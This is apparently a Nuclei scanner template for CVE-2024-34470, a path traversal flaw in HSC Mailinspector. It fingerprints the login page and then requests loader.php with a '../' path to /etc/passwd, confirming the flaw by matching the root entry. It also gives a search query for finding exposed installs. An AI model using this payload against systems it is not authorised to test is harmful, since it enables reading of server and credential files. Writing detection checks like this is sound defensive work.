id: CVE-2024-34470

info:
  name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion
  author: topscoder
  severity: high
  description: |
    An unauthenticated path traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly check whether the file and directory passed are inside the webroot, allowing an attacker to read arbitrary files on the server.
  impact: |
    Unauthenticated attackers can exploit the path traversal to read arbitrary files from the server.
  remediation: |
    Update HSC Mailinspector to a version later than 5.2.18 that patches the path traversal vulnerability.
  reference:
    - https://github.com/osvaldotenorio/CVE-2024-34470
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://nvd.nist.gov/vuln/detail/CVE-2024-34470
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
    epss-score: 0.06699
    epss-percentile: 0.93078
  metadata:
    verified: true
    max-request: 2
    fofa-query: "mailinspector/public"
  tags: cve,cve2024,lfi,mailinspector,hsc,vuln

flow: http(1) && http(2)

http:
  # Request 1: fingerprint the Mailinspector login page before sending the traversal probe
  - method: GET
    path:
      - "{{BaseURL}}/mailinspector/login.php"
    host-redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "Licensed to HSC TREINAMENTO"

  # Request 2: only runs if request 1 matched; confirms the flaw by reading /etc/passwd through the path parameter
  - method: GET
    path:
      - "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
      - type: status
        status:
          - 200
# digest: 4b0a00483046022100facbc189508b851a46ce6cfbeadf1964a472377b6d7f66cad263db2eb2d89791022100fb744e0effe38b78cd21e61407ceda23717ded5579835faff9277e34c2b4a43f:922c64590222798bb761d5b6d8e72950